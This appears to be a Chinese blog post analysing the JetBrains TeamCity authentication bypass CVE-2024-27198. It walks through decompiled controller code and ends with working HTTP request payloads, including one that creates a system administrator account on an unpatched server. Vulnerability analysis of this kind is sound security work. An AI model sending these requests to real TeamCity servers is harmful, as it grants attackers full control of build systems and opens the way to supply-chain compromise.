CVE-2024-27198 JetBrains TeamCity 身份验证绕过漏洞分析

已于 2024-03-07 18:56:25 修改
阅读量1.6k 收藏 20
点赞数 9
分类专栏: java代码审计 文章标签: 安全 网络 java web安全
于 2024-03-07 18:55:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shelter1234567/article/details/136542760
版权
JetBrainsTeamCity发布新版本修复了两个高危漏洞,包括CVE-2024-27198的身份验证绕过漏洞和CVE-2024-27199的路径遍历漏洞。攻击者可利用这些漏洞绕过认证并执行供应链攻击。漏洞源于web-openapi.jar中的控制器类,攻击者可通过特定URL参数控制执行任意代码。
摘要由CSDN通过智能技术生成
漏洞简介

JetBrains TeamCity 是一款由 JetBrains 公司开发的持续集成和持续交付服务器。它提供了强大的功能和工具,旨在帮助开发团队构建、测试和部署他们的软件项目

JetBrains TeamCity发布新版本修复了两个高危漏洞JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)与JetBrains TeamCity 路径遍历漏洞(CVE-2024-27199)。未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,创建管理员账户,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。远程攻击者利用该漏洞能够绕过身份认证在系统上执行任意代码。

Note: The JetBrains release blog for 2023.11.4 appears to display different publication dates based on the time zone of the reader. Some readers see that it was released March 3, while others see March 4. We've modified our language above to note that Rapid7 saw the release blog on March 4, regardless of what time it was released.

参考连接

CVE-2024-27198 and CVE-2024-27199: JetBrains TeamCity Multiple Authentication Bypass Vulnerabilities (FIXED) | Rapid7 Blog

版本下载Other Versions - TeamCity

漏洞分析

漏洞类web-openapi.jar下的

jetbrains.buildServer.controllers.BaseController

public abstract class BaseController extends AbstractController {
    
    // ...snip...
    
    public final ModelAndView handleRequestInternal(HttpServletRequest request, HttpServletResponse response) throws Exception {
        try {
            ModelAndView modelAndView = this.doHandle(request, response);
            if (modelAndView != null) {
                if (modelAndView.getView() instanceof RedirectView) {
                    modelAndView.getModel().clear();
                } else {
                    this.updateViewIfRequestHasJspParameter(request, modelAndView);
                }
            }
            // ...snip...

在这个方法中当处理后返回的modelAndView视图类型不为RedirectView,则会调用updateViewIfRequestHasJspParameter

如:在访问一个需要认证的接口,服务器返回401,重定向用户路径login.html。

但是我们在访问一个不存在的路径,服务器返回404 非Redirect ,这样就可以绕过上面的限制执行到updateViewIfRequestHasJspParameter

跟入updateViewIfRequestHasJspParameter

private void updateViewIfRequestHasJspParameter(@NotNull HttpServletRequest request, @NotNull ModelAndView modelAndView) {
​
    boolean isControllerRequestWithViewName = modelAndView.getViewName() != null && !request.getServletPath().endsWith(".jsp");
        
    String jspFromRequest = this.getJspFromRequest(request);
        
    if (isControllerRequestWithViewName && StringUtil.isNotEmpty(jspFromRequest) && !modelAndView.getViewName().equals(jspFromRequest)) {
        modelAndView.setViewName(jspFromRequest);
    }
}

白话文解释一下,modelAndView的不为空 请求的路径不以jsp结尾,isControllerRequestWithViewName将为真

这里我们猜测一下当用户请求一个不存在的资源,服务器统一返回404页面,这个内部的ServletPath 很有可能是404.html,不是jsp结尾 。因此isControllerRequestWithViewName可为真

继续分析getJspFromRequest

protected String getJspFromRequest(@NotNull HttpServletRequest request) {
    String jspFromRequest = request.getParameter("jsp");
        
    return jspFromRequest == null || jspFromRequest.endsWith(".jsp") && !jspFromRequest.contains("admin/") ? jspFromRequest : null;
}

requests是我们可控的量,因此这里我们可以控制有jsp参数!,是以jsp结尾的! 不包含admin/。最终返回的数据jspFromRequest是jsp=xxx 这是我们可控的量。

jspFromRequest是我们控制的量 ,且我们可以正常进入if语句中,

因此可以调用modelAndView.setViewName(jspFromRequest);实现updateView的操作。

我们可以利用这个机制绕过接口验证,达到调用任意接口的目的

漏洞复现

如下给出payload

GET /xxx?jsp=/app/rest/users/;.jsp HTTP/1.1
Host: 127.0.0.1:8111
sec-ch-ua: "Chromium";v="119", "Not?A_Brand";v="24"
X-TeamCity-SW-Cache: graphql
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Accept: application/json
X-TeamCity-Client: Web UI
X-Requested-With: XMLHttpRequest
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8111/admin/admin.html?item=users
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

一共有三点
1,请求xxx 是绕过重定向
2,;.jsp绕过请求后缀是jsp的限制
3,jsp=xxxx 这里就可以填上我们想要访问的接口了

也可以进行一些敏感的操作,如添加用户账号

POST /xxx?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 127.0.0.1:8111
Accept: */*
Content-Type: application/json
Content-Length: 124
Connection: close

{"username": "test6666", "password": "test6666", "email": "", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

昵称还在想呢
关注
  • 9
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27198)
m0_50797689的博客
03-06 193
JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)
漏洞分析CVE-2024-27198可RCE身份验证绕过JetBrains TeamCity
网络安全知识分享
03-11 1888
JetBrains发布了 TeamCity的风险通告,漏洞编号为 CVE-2024-27198 ,漏洞等级:高危,漏洞评分:9.8
CVE-2024-3094】——漏洞复现、原理分析以及漏洞修复
IronmanJay的博客
05-17 3556
XZ-Utils是Linux、Unix等POSIX兼容系统中广泛用于处理.xz文件的套件,包含liblzma、xz等组件,已集成在debian、ubuntu、centos等发行版仓库中。2024年3月29日,安全社区披露其存在CVE-2024-3094 XZ-Utils 5.6.0-5.6.1版本后门风险。该后门存在于XZ Utils的5.6.0和5.6.1版本中,由于SSH底层依赖了liblzma等,攻击者可能利用这一漏洞在受影响的系统上绕过SSH的认证获得未授权访问权限,执行任意代码。
JetBrains TeamCity 身份验证绕过漏洞 CVE-2024-27198 未授权创建用户token】 + 上传恶意插件执行命令 反弹shell【复现漏洞】【有漏洞exp】
weixin_43977052的博客
03-07 1259
1、绕过限制,未授权生成token。2、利用创建用户token上传恶意插件以实现任意代码执行。
[CVE-2024-27198]TeamCity<2023.11.4 身份验证绕过漏洞
whoami
03-07 406
JetBrains TeamCity在2023.11.4版本之前存在认证绕过漏洞,由于getJspFromRequest方法中对jsp请求判断不严,导致攻击者可通过使用;.jsp),绕过身份验证,访问未授权的API。未授权的攻击者可能通过利用该漏洞获取TeamCity管理员access token,从而控制CI/CD服务。它提供了一个集成的平台,用于自动构建、测试和部署软件项目。TeamCity支持各种不同的编程语言和版本控制系统,包括但不限于Java、C#、Python、Git、SVN等。
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
最新发布
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
Apache Shiro身份验证绕过漏洞(CVE-2020-13933)
07-17
直接使用java -jar srping....war命令运行即可 执行之后,访问http://主机的IP:8888/admin/*或者http://主机的IP:8888/login
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC
09-04
Tiki Wiki CMS Groupware 认证绕过漏洞CVE-2020-15906POC Tiki Wiki CMS Groupware或简称为Tiki(最初称为TikiWiki)是一种免费且开源的基于Wiki的内容管理系统和在线办公套件。在如下这些版本21.2, 20.4, 19.3, ...
CVE-2024-23897复现及IDS中snort防御规则制定
2401_82670286的博客
01-30 2516
CVE-2024-23897是一个涉及Jenkins未授权文件读取的漏洞。它利用了Jenkins命令行接口(CLI)的特性,其中CLI使用args4j库解析命令行参数。args4j库具有一个特点,即当命令行参数以@字符开头时,该参数会被视为文件路径,并将该文件内容读取作为参数。利用这一特性,攻击者可以通过Jenkins CLI读取Jenkins服务器上的任意文件。这段代码的主要问题在于它处理以字符开头的命令行参数时,会尝试将其视为文件路径,并读取该文件的内容。具体来说,如果参数以。
Nacos身份认证绕过漏洞(QVD-2023-6271)
热门推荐
qq_50854662的博客
03-20 1万+
漏洞原理为开源服务管理平台 Nacos在默认配置下未对 token.secret.key 进行修改,导致远程攻击者可以绕过密钥认证进入后台造成系统受控等后果。
CVE-2024-23897 Jenkins 任意文件读取漏洞
LJQClqjc的博客
01-26 3040
Jenkins 有一个内置的命令行界面CLI,在处理 CLI 命令时Jenkins 使用args4j 库解析 Jenkins 控制器上的命令参数和选项。此命令解析器具有一个功能,可以将@参数中后跟文件路径的字符替换为文件内容 ( expandAtFiles)。根据Jenkins 官方描述,具有Overall/Read权限的攻击者可以读取整个文件,未授权的攻击者仅能读取文件前几行内容。攻击者可以通过读取jenkins文件获取相关密钥从而实现命令执行。
漏洞复现】JumpServer(CVE-2024-29201、29202) 附带POC
qq_43355651的博客
04-02 2966
漏洞复现
云小课|Runc容器逃逸漏洞CVE-2024-21626)安全风险通告
华为云官方博客
02-04 1676
runc官方发布安全公告,披露runc 1.1.11及更早版本中存在容器逃逸漏洞,攻击者会利用该漏洞导致容器逃逸,进一步获取宿主机权限。
CVE-2022-32532 认证绕过漏洞分析
wangluo12138的博客
02-03 1147
CVE-2022-32532 认证绕过漏洞分析
CVE-2020-11651(SaltStack认证绕过)漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-28 535
SaltStack是使用Python开发的一个服务器基础架构集中化管理平台,底层采用动态的连接总线,使其可以用于编配,远程执行, 配置管理等等。Salt非常容易设置和维护,而不用考虑项目的大小。从数量可观的本地网络系统,到跨数据中心的互联网部署,Salt设计为在任意数量的server下都可工作。Salt的拓扑使用简单的server/client模式,需求的功能内建在一组daemon中。salt在几乎不改动配置的情况下就可以工作,也可以调整从而满足特定的需求。
NTP 身份验证绕过漏洞(CVE-2015-7871)
05-09
NTP是网络时间协议,用于同步计算机的时钟。CVE-2015-7871是NTP中的一个身份验证绕过漏洞,攻击者可以利用该漏洞来实现远程攻击并控制目标机器。 该漏洞的原因是NTP在处理某些特殊的数据包时会发生缓冲区溢出,导致攻击者可以通过发送精心构造的数据包来触发该漏洞。攻击者可以通过该漏洞来伪造NTP服务器并向目标机器发送虚假的时间戳,从而影响目标机器的时间同步,甚至导致拒绝服务攻击。 NTP官方已经发布了补丁来修复该漏洞,建议用户及时更新NTP软件版本以避免受到攻击。此外,还应加强网络安全防护措施,限制外部网络对NTP服务的访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

昵称还在想呢

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值